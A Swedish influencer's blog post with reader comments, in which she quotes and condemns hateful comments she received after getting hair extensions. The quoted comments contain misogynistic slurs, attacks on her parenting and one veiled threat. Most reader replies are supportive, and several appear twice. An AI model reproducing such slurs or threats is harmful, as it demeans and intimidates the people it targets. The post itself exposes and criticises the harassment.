BLOGGEN BOMBARDERAS, med hat, hot, förtal, trakasserier och elakheter! Pga av extenions?????

475A0045

Foto: Lisa Höök

BLOGGEN BOMBARDERAS, med hat, hot, förtal, trakasserier och elakheter!

-Vad händer?! 

Alvarligt talat. Jag VET att varje gång jag sätter i extenions (löshår ) så får jag skit. Men att såhär många nättroll kulle krypa fram och gå helt bananas, det TRODDE jag INTE!

Jag syftar då inte på en åsikt om huruvida man tycker att mitt egna naturliga hår är snyggare än mina externsions. Det var inte jätte många kommentarer från början. Ett tjugotal, och ca 12-15 som jag raderat och direkt skickat till skräpposten. När jag vaknade imorse och slog upp datorn och öppnade bloggen så mötes jag av HAT. KRÄNKNING och helt otroligt mycket näthat!

-VARFÖR?

Jag skickade ALLT till skräpposten. MÅÅÅÅNGA fler kommentarer än normalt!  Jag tänkte att jag skulle ignorera det… och döda det med tystnad. Men nu efter brunch med Lilleman och Jonas så kände jag annat! Varför ska det få passera obemärkt?

Är det okay att ge sig på någon genom en dataskärm?  Jag har klippt in och ut några av dom.

Varsegod och läs! 

My! här kommer ditt sanna jag fram, så jävla ful i ditt äckliga löshår!!!!!”

”Stackars din såkallade Lilleman som måste stå ut med sin ytliga, pinsamma mamma. Du tänker bara på dig själv och lever i en ytlig välrd bland pinsamma kändiskompisar. Löshåret visar ännu en gång hur misslyckad och patetisk du är, fuls jävla pinsamma FITTA!!!!”

”Vilket skämt! du ser nu ut som den uppblåsta bimbo som du är?! Du är en misslyckad mamma! Misslyckad bloggare, Misslyckad misslyckad, misslyckad! Och nu ser du även misslyckad ut! hahaha!” 

 ”Ehhhh?! hahahaha! skrattar högt åt ditt sätt att försöka se yngre ut! Du ser ut som en BILLIG HORA”

”STACKARS BOBBY att förknippas med någon så patetisk, misslyckad och FUL människa som du! Fattar han inte bättre! Vem använder löshår nuförtiden?!”

”Ser jag dig på stam i stockhom så ska jag klippa till en SNYGG frisyr! PASSA dig!!!”

”NOPP! Nej, synd att du inte ser det vi läsare ser att du är finare&fräshare i ditt egna naturliga lite kortare hår. Nu ser du bara ut som en uppblåst bimbo, men det kanske tilltalar dig vem vet …”

”ÄCKEL fitta!!!!!!! Så jävla FUL!!!!! Du ser ut som sen billiga slampa som du är!! hahah”

”SKÄMS MY! Vilken förebild är du nu för alla unga kvinnor och ammor? Det är 2017 och löshår är SÅ 90-tal. Hur kan du som har så många läsare inte tänka längre! Trodde verkligen så mycket mer om dig, nu avföljer jag dig!!! ”

475A0077

Ja du…. det är 2017 och dra mig baklänges så sjukt! Jag förespråkar valmöjligheten att var och en får själv bestämma över sin  egna kropp, sitt utseende och inte bör dömmas utefter hur man ser ut! Det är MIN personliga åsikt!

Detta jag visar ovan är dessvärre  bara en bråkdel av alla elakheter jag möttes av denna lördag morgon. HORA? FÖREBILD? SLAMPA? 

Jag trivs i både mitt naturliga hår och mina extension. jag har och kommer att fortsätta äta Bobbys Superhair för att det gör underverk för mitt skandinaviska hår… DET har INGENTING med saken att göra, ingenting!

Jag använder tejphår ifrån Toupema Belgal som Bobby och Tilda sätter på mig. Det slite knappt på håret så även tekniken på extensions har utvecklats under alla år… 

Här ser du en annan kommentar… denna är helt okay, hon tycker bättre om mitt naturliga hår, men skriver med sunt förnuft, HELT OKAY!!!

”Det är ok, men gillar det som är naturligt bättre. Är stolt över att ha ett friskt o äkta hår som äldre tant. Tror att alla dessa förlängningar osv sliter på håret i längden. Sen handlar det om vilken förebild man vill vara inför sina barn osv, dvs att man duger som man är, tycker det är viktigt.

Men vi är alla olika o har olika värderingar =)”

Men dom kommentarerna ovan, och resterande kommentarer som jag låter ligga i skräpposten… DET är INTE OKAY! Hur många gånger ska vi som influensers behöva lyfta ämnet, näthat? Det är 2017. Precis som många poängterar.

475A0087

-Har vi inte kommit längre än såhär???

Oavsett hur vi ser ut…. Så sitter väl ändå skönheten på insidan? Jag är ju precis densamma MED som UTAN extensions. Jag tycker att omväxling förnöjer.  Ibland sminkar jag mig mer,  ibland mindre, vissa dagar inte alls. Ibland har jag glittriga naglar, ibland naturella.

-So what?!  Det påverkar ju inte min personlighet! Det gör mig inte till en sämre person!

Jag jobbar som influensers och får bokningar till olika reklamkampanjer. Ibland som långhårig ibland som korthårig. Så förutom att jag tycker att variationen är sjukt kul, så tjänar jag dessutom pengar på det. Ska jag behöva kallas, fitta, hora, misslyckad, ta emot HOT?! Ifrågasättas som MAMMA?!  

Jag dömmer inte någon efter hur man ser ut. jag dömmer efter hur man är!!!!! Man duger precis som man är…. man behöver inte förändra sitt utseende OM man inte vill. Jag stöttar dig oavsett!!!!!!! Vill du, kör! jag stöttar dig i det också….. Jag stöttar den fira viljan att ha möjligheten att göra precis så som man själv vill…..

Det önskar jag att fler gjorde… DET är min grund i att uppfostra min Lilleman!

Kram

/ My Martens 

103 Komentarer

 1. Först vill jag säga att detta är inte OK,hur kan man överhuvudtaget skriva detta ?påhopp,elakheter och fula förnedrande ord. Men jag personligen dissar löshår,extensions osv sen jag såg Uppdrag Granskning,efter det så är min åsikt att ingen skulle köpa Detta när man ser hur de som gör detta för vi ska se fina ut,jobbar 6 dgr i veckan för några hundra i månaden.

  • Hej Liz! Det där… som du skriver det är inte något fel med det… inget näthat, inga hot, inga elakheter. Det är din åsikt =) Och den är du varmt välkommen att dela med di utav, Just den senaste dokumentärern har jag inte sett (ännu…) branschen kan variera väldigt, och precis så för några år sedan när man var nere och fimpade i smyg på en av H&M fabriker så är det långt ifrån alla gånger som det är okay tyvärr…. Ska kolla och vågar inte uttala mig mer om ämnet kring just den =) Kram och trevlig helg!

   • Vet inte om du missförstod det första jag skrev:-) det som de skriver till dig är helt oacceptabelt ?har man lite vett i huvudet så ska inte tanken ens finnas. Man blir chockad hur vuxna beter sig,sen ska vi vara föredöme för våra barn. Ha en bra helg och stå på dig✨??

   • My, se dokumentären om löshår, den går på SVT nu.
    Vidriga kommentarer som dessa du tog upp handlar naturligtvis inte om löshåret, det handlar om avundsjuka på att du mår bra och har ork och driv och är vacker. Det verkar ”trigga” igång mindervärdskomplex hos vissa. Du blir ett hot när du gör dig snygg.
    Dålig självkänsla kan sätta igång mycket ilska hos personer som är gränslösa.
    Hade jag varit du så hade jag satsat på ett mer privat liv. Jag förstår verkligen inte hur du orkar ta mer skit och mobbning. Vissa gränslösa människor kan dessutom gå långt i att skada andra och jag blir riktigt orolig när jag läser kommentarerna…
    Jag vet att du som influencer tjänar bra, men är det verkligen värt all denna utsatthet?
    Stay strong!

 2. My! ???
  Är en läsare som hittills aldrig kommenterat. Men i dag så.
  Du är så otroligt vacker, tro för guds skull inget annat. Och jösses, vilka små och osäkra människor som är inne och härjar bland kommentarerna… Snacka om att ha ett tråkigt liv och vara så liten i sitt jag, att man hej vilt måste ge sig på någon annan. Mycket sorgliga figurer.
  Såhär: du är superfin i ”bara” ditt eget hår, och du är lika fin i det långa. Varför det skulle vara 90-tal med hårförlängning finns det ingen logik i.
  Och: creds för att du lyfte fram kommentarna ur sophinken och visar vad du får stå ut med. För varför, varför skulle du fixa att höra sån sk*t mer än någon annan.
  Stå på dig. Bra rutet!
  Många varma kramar!

 3. Meeeen vad är det med folk? Har dom inga egna intressen utan behöver ge sig på andra.
  Alla får väl göra som dom vill. vare sig det är löshår, porslinständer, blekta tänder eller långa naglar. Skaffa er lite egna intressen säger jag bara.
  Stå på dig My och gör det du vill.
  Kram på dig Jonas och lilleman.

 4. Fina My. ?. Fortsätt att vara precis som du är. Det är bara du som kan bestämma vad du vill göra och inte göra. ? som jag skrivit tidigare så kan jag inte förstå allt vad ni som bloggar får utstå. Undrar om de beter sig likadant i det verkliga livet och ger sig på folk på stan med sina påhopp? . ? ha nu en fin helg med din lille vapendragare och din andra kärlek ???

 5. Hej My. Det är min kommentar som du återger o säger är ok. Tack för det, skulle aldrig använda dom ord som du återger från skräp posten. Det är under min värdighet o har svårt att förstå meningen med det. Tror kanske att reaktionerna blir så häftiga för att det nyss varit ett upprörande program på Tv om löshår. Det väckte många känslor.
  Kanske är det lättare att förstå när du beskriver varför du valt att använda det, trots att du är så nöjd med ditt eget hår o hissar Bobbys kapslar.
  I vilket fall är det ALDRIG ok med kränkande o oförskämda inlägg.
  Ha en bra helg o var rädd om Ludvig?

 6. Har svårt att tro att du fått vissa av de kommentarer som du skriver, men om det är så så är det hemskt, inte ska du kallas fula ord och hotas fy. Isåfall så är med all säkerhet en och samma person som skrivit. Men du brukar ju få uppmärksamhet i kvälls – och skvallerpressen när du skriver om näthat, kanske får du det nu också i t.ex Hänt, så inget ont som inte har nåt gott med sig. Så du klipper av håret och förlänger för att göra reklam/fotojobb oj wow. Jo förstår du gör reklam för Toupmalbelgal. Inte illa att få betalt för att förlänga och sen tjäna pengar på det. Är du med i modellagentur, vilken? Snygga stövlar du visar upp i reklambilderna. Och ditt hår är jättesnyggt.

  • Flera stycken olika pr/marknadsförings bolag =) Att vara modell är en sak, att vara influenser är en annan då är man både och =) Utan att var 175cm lång osv… Vilka jag är signad med kommer jag inte att skriva i bloggen =) tack, stövlarna är tok-sköna dessutom =)

 7. Så oerhört tråkigt att du ska behöva stå ut med det här?. Jag vet hur du jobbar o sliter för att din Lilleman ska ha det så bra och även att du ska ha det bra. Vi saknar dig och dina blommor på ön?. Är glad att allt börjar ordna upp sig för dig och framförallt att du får njuta av kärleken?. Skickar lite ölandskärlek till dig och din lilla fina familj??. Oavsett vad man tycker om någon förstår jag inte hur man orkar hata? Varför läsa ens om man bara blir arg?? Jag läser din blogg Och tycker om både den och dig?Stor kram till dig?

 8. Det är ju helt stört att du får ta så mycket skit!! Du är ju inte den enda som har extensions snälla någon!! Får alla andra lika mycket skit över några ynkliga extensions? Och vad då vilken förebild man vill vara för sina barn och visa hur vida man duger eller inte.. smink då??? Ska vi skita i att sminka oss, fixa håret och klä oss i snygga märkes kläder om vi nu gillar det, bara för att det visar barnen att man bara duger vid dyra extra grejer på sig eller?? Eller ska vi stärka ungarna oavsett smink, extensions, kläder och annat. Alltså lägg av. Lev som du vill, lyft inte upp dessa idioter igen, det ger de 5 sekunders fame (i detta fall en evighet på nätet) och det är precis det de vill. Sluta lyft upp de, sluta få de att synas, så försvinner de säkert någon dag, tänker jag i alla fall. Skulle aldrig ge de sån publicitet som du gör här, aldrig, det är de inte värda, att synas på min blogg för all evighet, ute på nätet. NOPE!
  Du är värd massor och det vet du, du är en grym mamma, en jättefin människa. Snygg med eller utan extensions, snygg som få. RADERA och lyft de som är fina mot dig, det är de värda.
  KRAM finaste. <3

 9. Alltså. . När jag läser kommentarerna ovan så undrar jag hur det står till i Hjärnkontoret hos folk. Man kan tycka både det ena och det andra och förfasas men att uttrycka sig på ett sådant kränkande sätt gentemot någon tyder ju på bristande omdöme. Fy vilka hemska bittra människor det finns som måste spy sin galla. Du är toppen My och ska inte behöva läsa sånt skit.

 10. Först vill jag säga att detta är inte OK,hur kan man överhuvudtaget skriva detta 🙈påhopp,elakheter och fula förnedrande ord. Men jag personligen dissar löshår,extensions osv sen jag såg Uppdrag Granskning,efter det så är min åsikt att ingen skulle köpa Detta när man ser hur de som gör detta för vi ska se fina ut,jobbar 6 dgr i veckan för några hundra i månaden.

  • Hej Liz! Det där… som du skriver det är inte något fel med det… inget näthat, inga hot, inga elakheter. Det är din åsikt =) Och den är du varmt välkommen att dela med di utav, Just den senaste dokumentärern har jag inte sett (ännu…) branschen kan variera väldigt, och precis så för några år sedan när man var nere och fimpade i smyg på en av H&M fabriker så är det långt ifrån alla gånger som det är okay tyvärr…. Ska kolla och vågar inte uttala mig mer om ämnet kring just den =) Kram och trevlig helg!

   • Vet inte om du missförstod det första jag skrev:-) det som de skriver till dig är helt oacceptabelt 😡har man lite vett i huvudet så ska inte tanken ens finnas. Man blir chockad hur vuxna beter sig,sen ska vi vara föredöme för våra barn. Ha en bra helg och stå på dig✨👍🏻

   • My, se dokumentären om löshår, den går på SVT nu.

    Vidriga kommentarer som dessa du tog upp handlar naturligtvis inte om löshåret, det handlar om avundsjuka på att du mår bra och har ork och driv och är vacker. Det verkar ”trigga” igång mindervärdskomplex hos vissa. Du blir ett hot när du gör dig snygg.

    Dålig självkänsla kan sätta igång mycket ilska hos personer som är gränslösa.

    Hade jag varit du så hade jag satsat på ett mer privat liv. Jag förstår verkligen inte hur du orkar ta mer skit och mobbning. Vissa gränslösa människor kan dessutom gå långt i att skada andra och jag blir riktigt orolig när jag läser kommentarerna…

    Jag vet att du som influencer tjänar bra, men är det verkligen värt all denna utsatthet?

    Stay strong!

 11. My! 🌹🌟🌹
  Är en läsare som hittills aldrig kommenterat. Men i dag så.
  Du är så otroligt vacker, tro för guds skull inget annat. Och jösses, vilka små och osäkra människor som är inne och härjar bland kommentarerna… Snacka om att ha ett tråkigt liv och vara så liten i sitt jag, att man hej vilt måste ge sig på någon annan. Mycket sorgliga figurer.
  Såhär: du är superfin i ”bara” ditt eget hår, och du är lika fin i det långa. Varför det skulle vara 90-tal med hårförlängning finns det ingen logik i.
  Och: creds för att du lyfte fram kommentarna ur sophinken och visar vad du får stå ut med. För varför, varför skulle du fixa att höra sån sk*t mer än någon annan.
  Stå på dig. Bra rutet!
  Många varma kramar!

 12. Meeeen vad är det med folk? Har dom inga egna intressen utan behöver ge sig på andra.
  Alla får väl göra som dom vill. vare sig det är löshår, porslinständer, blekta tänder eller långa naglar. Skaffa er lite egna intressen säger jag bara.
  Stå på dig My och gör det du vill.
  Kram på dig Jonas och lilleman.

 13. Fina My. 😘. Fortsätt att vara precis som du är. Det är bara du som kan bestämma vad du vill göra och inte göra. 😊 som jag skrivit tidigare så kan jag inte förstå allt vad ni som bloggar får utstå. Undrar om de beter sig likadant i det verkliga livet och ger sig på folk på stan med sina påhopp? . 🤔 ha nu en fin helg med din lille vapendragare och din andra kärlek 😍🙏💕

 14. Hej My. Det är min kommentar som du återger o säger är ok. Tack för det, skulle aldrig använda dom ord som du återger från skräp posten. Det är under min värdighet o har svårt att förstå meningen med det. Tror kanske att reaktionerna blir så häftiga för att det nyss varit ett upprörande program på Tv om löshår. Det väckte många känslor.
  Kanske är det lättare att förstå när du beskriver varför du valt att använda det, trots att du är så nöjd med ditt eget hår o hissar Bobbys kapslar.
  I vilket fall är det ALDRIG ok med kränkande o oförskämda inlägg.
  Ha en bra helg o var rädd om Ludvig😊

 15. Har svårt att tro att du fått vissa av de kommentarer som du skriver, men om det är så så är det hemskt, inte ska du kallas fula ord och hotas fy. Isåfall så är med all säkerhet en och samma person som skrivit. Men du brukar ju få uppmärksamhet i kvälls – och skvallerpressen när du skriver om näthat, kanske får du det nu också i t.ex Hänt, så inget ont som inte har nåt gott med sig. Så du klipper av håret och förlänger för att göra reklam/fotojobb oj wow. Jo förstår du gör reklam för Toupmalbelgal. Inte illa att få betalt för att förlänga och sen tjäna pengar på det. Är du med i modellagentur, vilken? Snygga stövlar du visar upp i reklambilderna. Och ditt hår är jättesnyggt.

  • Flera stycken olika pr/marknadsförings bolag =) Att vara modell är en sak, att vara influenser är en annan då är man både och =) Utan att var 175cm lång osv… Vilka jag är signad med kommer jag inte att skriva i bloggen =) tack, stövlarna är tok-sköna dessutom =)

 16. Det är så fruktanvärt med orden hora,slampa och fitta. Det är säkert tjejer med som skriver dessa ord:( vi som ska hålla ihop! Inte gå och kalla varandra så nedvärderande saker.
  Fyfan,så jävla synd:(
  Och vad har det med hår att göra?

 17. Så oerhört tråkigt att du ska behöva stå ut med det här😞. Jag vet hur du jobbar o sliter för att din Lilleman ska ha det så bra och även att du ska ha det bra. Vi saknar dig och dina blommor på ön💕. Är glad att allt börjar ordna upp sig för dig och framförallt att du får njuta av kärleken💗. Skickar lite ölandskärlek till dig och din lilla fina familj😊💗. Oavsett vad man tycker om någon förstår jag inte hur man orkar hata? Varför läsa ens om man bara blir arg?? Jag läser din blogg Och tycker om både den och dig😊Stor kram till dig💗

 18. Det är ju helt stört att du får ta så mycket skit!! Du är ju inte den enda som har extensions snälla någon!! Får alla andra lika mycket skit över några ynkliga extensions? Och vad då vilken förebild man vill vara för sina barn och visa hur vida man duger eller inte.. smink då??? Ska vi skita i att sminka oss, fixa håret och klä oss i snygga märkes kläder om vi nu gillar det, bara för att det visar barnen att man bara duger vid dyra extra grejer på sig eller?? Eller ska vi stärka ungarna oavsett smink, extensions, kläder och annat. Alltså lägg av. Lev som du vill, lyft inte upp dessa idioter igen, det ger de 5 sekunders fame (i detta fall en evighet på nätet) och det är precis det de vill. Sluta lyft upp de, sluta få de att synas, så försvinner de säkert någon dag, tänker jag i alla fall. Skulle aldrig ge de sån publicitet som du gör här, aldrig, det är de inte värda, att synas på min blogg för all evighet, ute på nätet. NOPE!

  Du är värd massor och det vet du, du är en grym mamma, en jättefin människa. Snygg med eller utan extensions, snygg som få. RADERA och lyft de som är fina mot dig, det är de värda.
  KRAM finaste. <3

 19. Bry dej inte om dom elaka kommentarerna.
  Ombyte förnöjer….och du gör det du känner för.
  Man kan inte vara alla till lags:) Kram.

 20. Men herre! Ja folk är inte kloka !
  Hoppas verkligen du låter detta passera utan att ta dig till nånting av vad de skriver .
  Varför måste en utrycka vad en tycker om en inte håller med ? Typ som ” ja det var väl inte så snyggt o JAG skulle inte …” Nä men SÄG då inget! Ingen frågar ju om din åsikt??? Sånt möts vi ju alla av, inte bara influencers. Håller på själv att byta jobb o möts av många: jaja JAG skulle ju aldrig söka detta jobba ..
  ”Nämen vad bra att JAG söker det då , så slipper ju du ”. Brukar jag svara . Förstår dock inte varför folk utrycker sig ? Vad är meningen?
  Kram till dig ?

 21. Alltså. . När jag läser kommentarerna ovan så undrar jag hur det står till i Hjärnkontoret hos folk. Man kan tycka både det ena och det andra och förfasas men att uttrycka sig på ett sådant kränkande sätt gentemot någon tyder ju på bristande omdöme. Fy vilka hemska bittra människor det finns som måste spy sin galla. Du är toppen My och ska inte behöva läsa sånt skit.

 22. Fina duktiga vackra MY,man kan inte tro det är sant att människor kan skriva så till någon.Dessa människor måste vara avundsjuka eller sjuka,kanske både och.Du är så fin bpde med och utan löshår. Ta inte åt dig av detta,tänk på att de som skriver såhär är allvarligt sjuka.

 23. Det är så fruktanvärt med orden hora,slampa och fitta. Det är säkert tjejer med som skriver dessa ord:( vi som ska hålla ihop! Inte gå och kalla varandra så nedvärderande saker.
  Fyfan,så jävla synd:(
  Och vad har det med hår att göra?

 24. Sådana påhopp gör mig arg.
  Om jag läser något jag inte gillar så låter jag bli att vräka ur mig en massa skit.
  Tänker en gång till och ger kanske en humoristisk kommentar eller struntar i det.
  Du är väldigt snygg även på bilden när du var sjuk.
  Ha nu en härlig helg med Ludvig och Jonas.
  Kram L

 25. My du är GRYMT SNYGG? avundsjuka finns alltid å att vi tjejer e så sjukt elaka mot varann gör mig chockerad ? men igen de e avundsjuka, för du ÄR SNYGG, kram å trevlig helg

 26. Bry dej inte om dom elaka kommentarerna.
  Ombyte förnöjer….och du gör det du känner för.
  Man kan inte vara alla till lags:) Kram.

 27. Men herre! Ja folk är inte kloka !
  Hoppas verkligen du låter detta passera utan att ta dig till nånting av vad de skriver .
  Varför måste en utrycka vad en tycker om en inte håller med ? Typ som ” ja det var väl inte så snyggt o JAG skulle inte …” Nä men SÄG då inget! Ingen frågar ju om din åsikt??? Sånt möts vi ju alla av, inte bara influencers. Håller på själv att byta jobb o möts av många: jaja JAG skulle ju aldrig söka detta jobba ..
  ”Nämen vad bra att JAG söker det då , så slipper ju du ”. Brukar jag svara . Förstår dock inte varför folk utrycker sig ? Vad är meningen?
  Kram till dig 💕

 28. Hej!
  Det sämsta du kan göra är att citera alla hatinlägg…det är ju det dom vill! Du gör dom en tjänst. Läs på om näthat och spammare.
  Ta bort alla så dom inte står kvar!!
  Du får bara fler.
  Med vänlig hälsning Tant P 73 år

  • Ja vad ska man säga? Det är sorgligt att människor uttalar sig så bara för ett löshår. Du är ju otroligt driftig och företagsam tjej. Va den du är! Lägg i extensions när du vill, gör det du känner för.
   Du måste hela tiden försvara dig. När det gäller val av jobb , lilleman , boende. Folk tycker så mycket hela tiden. Gör det du känner för i skit i andra!

 29. Fina duktiga vackra MY,man kan inte tro det är sant att människor kan skriva så till någon.Dessa människor måste vara avundsjuka eller sjuka,kanske både och.Du är så fin bpde med och utan löshår. Ta inte åt dig av detta,tänk på att de som skriver såhär är allvarligt sjuka.

 30. Sådana påhopp gör mig arg.
  Om jag läser något jag inte gillar så låter jag bli att vräka ur mig en massa skit.
  Tänker en gång till och ger kanske en humoristisk kommentar eller struntar i det.

  Du är väldigt snygg även på bilden när du var sjuk.
  Ha nu en härlig helg med Ludvig och Jonas.

  Kram L

 31. My du är GRYMT SNYGG😍 avundsjuka finns alltid å att vi tjejer e så sjukt elaka mot varann gör mig chockerad 😱 men igen de e avundsjuka, för du ÄR SNYGG, kram å trevlig helg

 32. Men alltså! Jag sitter och tappar hakan här! Jag skäms över hur folk beter sig. Varför måste man uttrycka sig så?! Kan inte förstå det. Ren avundsjuka!
  Självklart får man tycka och tänka men absolut inte kränka!!
  Stå på dig My!

 33. Fina fina äkta My.
  Jag har. Haft äran att träffa dig framför Allt i din butik både med och utan lilleman.
  Lilleman är en trygg och harmoniskt kille
  Du har lyckats väl med honom och din hund ❤️
  Jonas har jag inte träffat men är övertygad att han är killen med stort H ✨
  Försök låt bli att ta åt dig. Du är underbar

 34. Men alltså – herregud… Att människor bara orkar. Du är så fin så fin och vad du gör eller inte gör har ingen annan att göra med. Jag gör mina naglar och färgar mitt hår, herregud vilken dålig människa jag måste vara…

 35. Kan inte tro det är sant det jag läser!?
  Får inte ihop det alls att du skulle vara en sämre mamma bara för att du har satt i extencions i håret?
  Man gör som man vill med sin egna kropp och utseende!
  Förstår inte att folk orkar bry sig och kommentera så grova saker bara för att du har förlängt ditt hår lite.. Jag blir mörkrädd!
  Stå på dig!

 36. Hej!
  Det sämsta du kan göra är att citera alla hatinlägg…det är ju det dom vill! Du gör dom en tjänst. Läs på om näthat och spammare.
  Ta bort alla så dom inte står kvar!!
  Du får bara fler.
  Med vänlig hälsning Tant P 73 år

  • Ja vad ska man säga? Det är sorgligt att människor uttalar sig så bara för ett löshår. Du är ju otroligt driftig och företagsam tjej. Va den du är! Lägg i extensions när du vill, gör det du känner för.
   Du måste hela tiden försvara dig. När det gäller val av jobb , lilleman , boende. Folk tycker så mycket hela tiden. Gör det du känner för i skit i andra!

 37. Blir så himla arg när jag läser detta!! Du är toppen oavsett om du har extensions eller ej! Vad sänder man för budskap själv om man sitter och hackar på en annan människa på detta vis. Alla har rätt att vara precis som man vill, se ut hur man själv vill, tycka vad man vill men att hoppa på en annan människa på detta sätt e ej ok! Fortsätt vara dig själv precis dom du är ❤️
  Kramar!

 38. Hej My!
  En tanke som slår mig nu (och har slagit mig tidigare när du har berättat om alla elaka kommentarer och hot du får) är att en del av de som skriver kanske är tonåringar eller rent av barn. Att kalla varandra ”hora” och ”slampa” är vanligare bland barn och tonåringar än t ex bland 30- och 40-åringar (som använder andra skällsord). Det är lika illa det du får utstå vare sig det är barn, ungdomar eller vuxna som skriver, men jag tror att det kan vara något att tänka på ändå. Har du förresten läst intervjun med Joakin Lundell i DN (https://www.dn.se/kultur-noje/jocke-jonna-om-den-svara-konsten-att-sluta-vara-barn/). Han beskriver hur han och hans fru blev trakasserade och till och med mordhotade av följare som bara var 8-12 år!
  Jag ville bara dela med mig av min fundering ? Stå på dig och fortsätt ha vilken frisyr du än behagar ?

 39. Men alltså! Jag sitter och tappar hakan här! Jag skäms över hur folk beter sig. Varför måste man uttrycka sig så?! Kan inte förstå det. Ren avundsjuka!
  Självklart får man tycka och tänka men absolut inte kränka!!
  Stå på dig My!

 40. Fina fina äkta My.
  Jag har. Haft äran att träffa dig framför Allt i din butik både med och utan lilleman.
  Lilleman är en trygg och harmoniskt kille
  Du har lyckats väl med honom och din hund ❤️
  Jonas har jag inte träffat men är övertygad att han är killen med stort H ✨

  Försök låt bli att ta åt dig. Du är underbar

 41. Men alltså – herregud… Att människor bara orkar. Du är så fin så fin och vad du gör eller inte gör har ingen annan att göra med. Jag gör mina naglar och färgar mitt hår, herregud vilken dålig människa jag måste vara…

 42. Kära du! Du är vacker som en solstråle! Det är svårt att förstå sig på detta hat och vem som sprider detta tråkiga. Deras sätt visar bara vem de är och säger ingenting om dig. Herre Gud ett hår! Att människor inte förstår att man kan gilla kläder, hår och vad det nu är för att det är roligt, kreativt och man mår bra av att känna sig fin. Vad man tycker är fint är så klart olika och det är ju härligt! Koppla för guds skull inte ihop det med ens inre värderingar och vem man är som mamma. Ps Jag tycker det var super duper snyggt! Skulle gärna ha det vackra svallet! Sprid lite kärlek! Inte hat ❤️

 43. Kan inte tro det är sant det jag läser!?
  Får inte ihop det alls att du skulle vara en sämre mamma bara för att du har satt i extencions i håret?

  Man gör som man vill med sin egna kropp och utseende!

  Förstår inte att folk orkar bry sig och kommentera så grova saker bara för att du har förlängt ditt hår lite.. Jag blir mörkrädd!

  Stå på dig!

 44. Blir så himla arg när jag läser detta!! Du är toppen oavsett om du har extensions eller ej! Vad sänder man för budskap själv om man sitter och hackar på en annan människa på detta vis. Alla har rätt att vara precis som man vill, se ut hur man själv vill, tycka vad man vill men att hoppa på en annan människa på detta sätt e ej ok! Fortsätt vara dig själv precis dom du är ❤️
  Kramar!

 45. Jag sitter här helt mållös. Jag kan inte förstå detta. Jag tänker om det kan va nån snorunge som skrivit, men det är väl inga ” glin” som kollar din blogg tänker jag sen. Alltså på riktigt My, det här är riktigt riktigt sjukt och människor skrämmer mig verkligen!!!!!
  Att det kan finnas sådana varelser. Jag är uppriktigt förbannad så det knyter sig i magen. Tänk att få möta ett sånt arsle och ifrågasätta skiten. Då pissar väl vederböranden på sig av skam kan jag tro. Nä fy Fan säger jag bara o kräks lite grann!!??
  Ha de gott med dina nära o kära!?

  • Å jag menar VEM bryr sig om du har extensions eller inte? Det är de sista jag tänker nämnvärt på i din blogg. Tycker mest de är kul att se o följa dig vad du tar dig för efter flytten och allt de nya som händer. Har fortfarande inte smält de sinnessjuka kommentarerna ?

 46. Hej My!

  En tanke som slår mig nu (och har slagit mig tidigare när du har berättat om alla elaka kommentarer och hot du får) är att en del av de som skriver kanske är tonåringar eller rent av barn. Att kalla varandra ”hora” och ”slampa” är vanligare bland barn och tonåringar än t ex bland 30- och 40-åringar (som använder andra skällsord). Det är lika illa det du får utstå vare sig det är barn, ungdomar eller vuxna som skriver, men jag tror att det kan vara något att tänka på ändå. Har du förresten läst intervjun med Joakin Lundell i DN (https://www.dn.se/kultur-noje/jocke-jonna-om-den-svara-konsten-att-sluta-vara-barn/). Han beskriver hur han och hans fru blev trakasserade och till och med mordhotade av följare som bara var 8-12 år!

  Jag ville bara dela med mig av min fundering 🙂 Stå på dig och fortsätt ha vilken frisyr du än behagar 😉

 47. Men alltså… på riktigt??? Förlåt My, men jag vet faktiskt inte om jag ska skratta eller gråta ? Vad är det med människor?? Åter igen. På riktigt?? Jag äter en flitig läsare av din blogg. Jag följer dig på ig. Varför? Jo, för att en gång såg jag dig i Ensam mamma söker. Jag tyckte att du verkade så reko och så himla lik mig ? Jag är dock typ 12-13 år äldre än vad du är. Hur som helst. Jag hittade din blogg och din ig och jag läser och följer pga jag gillat dig. Hade jag inte gjort det, så kan väl vilken kvastskaft som helst räkna ut att då hade jag lagt min tid på ngt annat ? HUR kan man då, är min fråga, lägga sin energi på hat? Jag kan verkligen inte förstå. Men jag är säkert trög på nåt vis. Jag har ju oxå extensions till och från ????

 48. Fy så arg man blir!!!
  Jag tycker att du är tuff och ärlig som står för dina åsikter och olikheter. Precis som du skriver ombyte förnöjer! Frågan jag ställer mig är: har alla dessa människor alltid samma klädstil, själv varierar jag mig med att ibland ha sköna lite slappare kläder, ibland snygga tighta kläder och ibland myser jag i mysbyxor…
  Det är ju variationen som gör det!
  Nej skäms till er alla vidriga nättroll och fortsätt du att vara samma härliga my, du inspirerar!
  Kramar från falun

 49. Kära du! Du är vacker som en solstråle! Det är svårt att förstå sig på detta hat och vem som sprider detta tråkiga. Deras sätt visar bara vem de är och säger ingenting om dig. Herre Gud ett hår! Att människor inte förstår att man kan gilla kläder, hår och vad det nu är för att det är roligt, kreativt och man mår bra av att känna sig fin. Vad man tycker är fint är så klart olika och det är ju härligt! Koppla för guds skull inte ihop det med ens inre värderingar och vem man är som mamma. Ps Jag tycker det var super duper snyggt! Skulle gärna ha det vackra svallet! Sprid lite kärlek! Inte hat ❤️

 50. Jag sitter här helt mållös. Jag kan inte förstå detta. Jag tänker om det kan va nån snorunge som skrivit, men det är väl inga ” glin” som kollar din blogg tänker jag sen. Alltså på riktigt My, det här är riktigt riktigt sjukt och människor skrämmer mig verkligen!!!!!

  Att det kan finnas sådana varelser. Jag är uppriktigt förbannad så det knyter sig i magen. Tänk att få möta ett sånt arsle och ifrågasätta skiten. Då pissar väl vederböranden på sig av skam kan jag tro. Nä fy Fan säger jag bara o kräks lite grann!!??

  Ha de gott med dina nära o kära!💚

  • Å jag menar VEM bryr sig om du har extensions eller inte? Det är de sista jag tänker nämnvärt på i din blogg. Tycker mest de är kul att se o följa dig vad du tar dig för efter flytten och allt de nya som händer. Har fortfarande inte smält de sinnessjuka kommentarerna 😕

